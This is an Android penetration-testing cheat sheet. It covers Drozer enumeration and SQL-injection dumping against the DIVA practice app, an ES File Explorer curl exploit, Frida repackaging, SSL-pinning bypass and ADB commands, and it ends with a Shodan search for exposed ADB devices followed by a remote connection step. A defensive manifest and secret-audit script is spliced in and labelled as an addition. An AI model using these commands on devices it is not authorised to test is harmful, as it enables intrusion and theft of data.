
Android Pentest




Port Scan on Android

Since many random ports can be open on Android devices, it is always better to scan all the ports, for example with RustScan:

https://github.com/RustScan/RustScan/releases
#download the Debian package and install it
dpkg -i <filename>.deb
rustscan -a 10.10.10.247

Then run nmap -sC -sV against the open ports for default scripts and version detection.

Installing ADB

sudo apt-get install android-tools-adb

Setting up Drozer

#Installing drozer on docker
docker pull withsecurelabs/drozer
#Download the drozer Agent and install it on Android; download from https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0
#Drag and drop on the emulator or install via adb
adb install drozer-agent.apk
#on Windows, set up port forwarding for the emulator
adb forward tcp:31415 tcp:31415
#Get a docker shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
#inside the container, start drozer
drozer console connect --server host.docker.internal

# Method - II
#Find the IP address in About
#Connect to the Android device using its IP address
docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10
#Get a shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
drozer console connect --server <phone IP address>

Drozer Commands

#list all functionality
list
#List packages
run app.package.list
#Filter for a specific app keyword
run app.package.list -f diva
#Basic info
run app.package.info -a jakhar.aseem.diva
#List activities, broadcast receivers, content providers and services
run app.package.attacksurface jakhar.aseem.diva

#If the app has an exported activity
#Get activity info
run app.activity.info -a jakhar.aseem.diva
#View/access the exported activity if Permission: null
run app.activity.start --component jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity
run app.activity.start --component <package> <package>.<ActivityName>
#You can open the exported activity directly from adb shell (component form is package/.Activity)
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity

#If the app has providers
#Get info on content providers
run app.provider.info -a jakhar.aseem.diva
#Run the scanner to find provider URIs
#Take the content URIs listed under "For Sure Accessible Content URIs"
run scanner.provider.finduris -a jakhar.aseem.diva
#Query a provider URI
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/
#Look for injection vulnerabilities in an app
run scanner.provider.injection -a jakhar.aseem.diva
#Automatically exploit SQL injection - print tables
run scanner.provider.sqltables -a jakhar.aseem.diva

Static Analysis

#Decompile the application
apktool d application.apk
#Decompile without resources; use when the app is too large
apktool d application.apk -r
#Search for strings in all locations
#Even the lib directory can contain useful source code or an API key
#Use strings on .so/ELF files
#The smali directory contains the source code, but not in a readable format; use a dex-to-jar converter

Locations to check for Secrets

- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml - search for the strings below:
  - firebase_database_url
  - google_api_key
  - google_app_id
  - google_crash_reporting_api_key
  - google_storage_bucket
  - client_id
  - API
  - password
  - AWS
  - Secret
  - http:// or https://
  - .db or .sqlite or SQL
- Or better, open the APK in jadx-gui from https://github.com/skylot/jadx/releases/tag/v1.5.0

In Android Manifest.xml keywords to Look for

- API Keys
- Providers / Content Providers; find the ones which are exported
- SdkVersion
- Permissions
- exported="true" - Activities. Activities with exported="true" can be started/opened from adb shell (just add a / before .activityname):
  am start b3nac.injuredandroid/.b25lActivity
  Make sure there is no sensitive data in any activity where exported="true".
- backup - the application saves some backup data when running (the attribute is near the top of the manifest)
- Debug
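A small audit script for the two checks above, run over apktool output: which components in AndroidManifest.xml are reachable by other apps, and which res/values/strings.xml names look like secrets. This is an added example, not code from the original post; it goes slightly beyond the page's exported="true" grep by also applying Android's implicit export defaults (intent-filter present, or a provider with targetSdkVersion below 17). The manifest and strings.xml below are constructed samples.

```python
"""Audit a decompiled APK: exported components in AndroidManifest.xml and
secret-looking names in res/values/strings.xml (constructed sample data)."""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "service", "receiver", "provider")
# Resource names the cheat sheet says to look for in res/values/*.xml
SECRET_KEYS = re.compile(r"firebase_database_url|google_api_key|google_app_id|"
                         r"google_crash_reporting_api_key|google_storage_bucket|"
                         r"client_id|api|password|aws|secret", re.I)

def is_exported(elem, target_sdk):
    """Resolve android:exported including the implicit defaults: an explicit
    attribute wins; otherwise a component with an <intent-filter> is exported
    (explicit declaration only became mandatory at targetSdk 31), and a
    <provider> defaults to exported when targetSdkVersion < 17."""
    explicit = elem.get(ANDROID_NS + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return target_sdk < 17
    return elem.find("intent-filter") is not None

def exported_components(manifest_xml):
    """Return (tag, name) for every component other apps can reach."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    target = int(sdk.get(ANDROID_NS + "targetSdkVersion", "1")) if sdk is not None else 1
    return [(c.tag, c.get(ANDROID_NS + "name")) for c in root.find("application")
            if c.tag in COMPONENTS and is_exported(c, target)]

def secret_strings(strings_xml):
    """Return (name, value) of <string> entries whose name matches a secret keyword."""
    root = ET.fromstring(strings_xml)
    return [(s.get("name"), s.text) for s in root.iter("string")
            if SECRET_KEYS.search(s.get("name", ""))]

# Constructed sample manifest: targetSdk 16, so the provider is implicitly exported
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-sdk android:targetSdkVersion="16"/>
  <application>
    <activity android:name=".MainActivity"><intent-filter/></activity>
    <activity android:name=".DebugActivity" android:exported="true"/>
    <activity android:name=".InternalActivity"/>
    <provider android:name=".NotesProvider"/>
    <service android:name=".SyncService" android:exported="false"><intent-filter/></service>
  </application></manifest>"""
STRINGS = """<resources><string name="app_name">Example</string>
  <string name="google_api_key">AIza-constructed-placeholder</string>
  <string name="aws_secret">constructed-placeholder</string></resources>"""
```

Point the two functions at the real files under the apktool output directory; anything reported by exported_components deserves a look at what the component does when started by an untrusted caller.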

AWS Enumeration

Use the Cloud Enum tool (available on GitHub).

Firebase DB Enum

- See if you can find a Firebase URL in the source code; if yes, go to it and see what you can find there
- dirb it and find any exposed content
- Find the DB from the apk using https://github.com/Sambal0x/firebaseEnum
git clone https://github.com/Sambal0x/firebaseEnum.git
cd firebaseEnum
python -m pip install -r requirements.txt
python3 firebaseEnum.py -k APK_Name

Abusing ES File Explorer Vuln

The exploit can be downloaded from here,

or you can use curl to abuse it:


curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777

Installing and Setting up Frida & Objection

python -m pip install setuptools
python -m pip install frida-tools
python -m pip install objection
#add this path to the env PATH - update as required
"C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0"
#patch the apk with objection first; if that doesn't work, patch it with frida manually
#A new apk is generated in the same directory with the name name.objection.apk
#Drag and drop the new apk into the Android emulator: uninstall the original apk and install the new patched apk.
objection patchapk --source injuredAndroid.apk

Patching Manually using Frida

You can follow this tutorial.

#Decompile without resources; use when the app is too large
apktool d application.apk -r
#Go to the lib directory of the apk and to the appropriate architecture of the emulator
APK_NAME/lib/x86_64/
#Go to Frida Releases and download the appropriate gadget
frida-gadget-16.3.3-android-x86_64.so.xz
#Rename the file to libfrida-gadget.so or frida-gadget.so (based on the library naming convention) and copy it into APK_NAME/lib/x86_64/
#Paste the code below into any smali file which you know loads for sure - Example: MainActivity.smali under /APK_NAME/smali/Company/APK_NAME/ (Ex: injuredAndroid/smali/b3nac/injuredandroid/) and save it.
const-string v0, "frida-gadget"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V

#Add the Internet permission to the manifest if it is not there already, so that the Frida gadget can open a socket.
<uses-permission android:name="android.permission.INTERNET" />
#Rebuild the apk
apktool b injuredAndroid -o inured_patched.apk
apktool b DirectoryPath -o Output.apk
#Sign the APK
keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname
jarsigner -verify inured_patched.apk

Installing zipalign

nano /etc/apt/sources.list
#comment out the kali apt source and add the line below
deb http://ftp.de.debian.org/debian buster main
sudo apt update
sudo apt install zipalign
zipalign 4 inured_patched.apk inured_final.apk
#Drag and drop the final apk into the emulator and start the app
#Start objection to run the apk
objection explore
#Disable ssl pinning
android sslpinning disable

Dynamic Analysis with MobSF

#for Linux, download MobSF and run setup.sh, then run.sh
#for Windows, download Docker from https://docs.docker.com/desktop/install/windows-install/
#Setup MobSF
docker pull opensecurity/mobile-security-framework-mobsf:latest
#Run MobSF
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
#or add a new env variable
Variable name: mobsf
Variable value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
#from now on, type the following on cmd to run MobSF on docker
%mobsf%
#Access the application using creds mobsf/mobsf
http://127.0.0.1:8000/login/
#Add the path below to the PATH environment variable
C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator

ADB Commands

ADB Cheatsheet is here

#Port forward a port from the Android device to ADB
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local

#Connect to a device over wireless
adb tcpip 9090

#connect to the service
adb connect 127.0.0.1:5555

#list connected devices
adb devices

#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell


#get a shell
adb shell

#get root privs from a shell
su

#install an apk
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"

#Getting screenshots
adb shell screencap <path to save>

#Recording the screen
adb shell screenrecord <path to save>

#Downloading files
adb pull <source file path> <destination file path>

#Uploading files
adb push <source file path> <destination file path>

#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>

#Getting system information
adb shell getprop

Commands inside ADB Shell

#List available packages
pm list packages
#Find a specific package
pm list packages | grep Name
#Find the path of the package
pm path full_packageName
pm path b3nac.injuredandroid
package:/data/app/b3nac.injuredandroid-1/base.apk
#Download the apk back to the host machine
#exit out of the adb shell
exit
adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
#in case you have multiple emulators open
adb -s emulator-5556 pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk
#you can now open the apk for static analysis

Finding Devices on Shodan

#Shodan search query
android debug bridge
adb connect 100.100.100.100:5555

Get Remote Access of a device

apt install scrcpy
scrcpy
